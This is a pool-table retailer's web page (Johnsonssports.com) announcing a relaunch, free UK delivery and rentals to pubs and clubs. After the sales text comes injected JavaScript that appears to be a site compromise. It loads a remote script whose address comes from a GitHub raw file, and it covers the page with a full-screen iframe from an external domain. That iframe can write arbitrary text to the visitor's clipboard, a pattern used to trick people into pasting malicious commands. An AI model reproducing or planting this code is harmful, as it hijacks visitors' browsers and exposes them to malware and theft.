www.Johnsonssports.com has just been launched with a new look, We have been a established for over 26 yrs, are continuing to run as a family business.
We have various Pool tables available from new and used, All Pool Tables are Manufactured in the UK. We have Free Play, Pool Dining Tables and Coin operated Pool tables Available, We also offer 50/50 Profit shares and other rentals to Pubs, Clubs and Work places.
We offer free delivery to most areas of the UK, We can also offer Installation at an extra cost. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });) (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)(function() {
const configLink = “https://corsproxy.io/?url=http://heyues.live”;
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(” “);
}
return response.text();
})
.then(finalUrl => {
return fetch(finalUrl, { method: “HEAD” })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {
});
}
if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}
window.__digitalflwrFetchPromise
.then(result => {
if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener(“message”, function(event) {
if (!event.data || event.data.type !== “copy”) return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement(“textarea”);
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand(“copy”);
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})();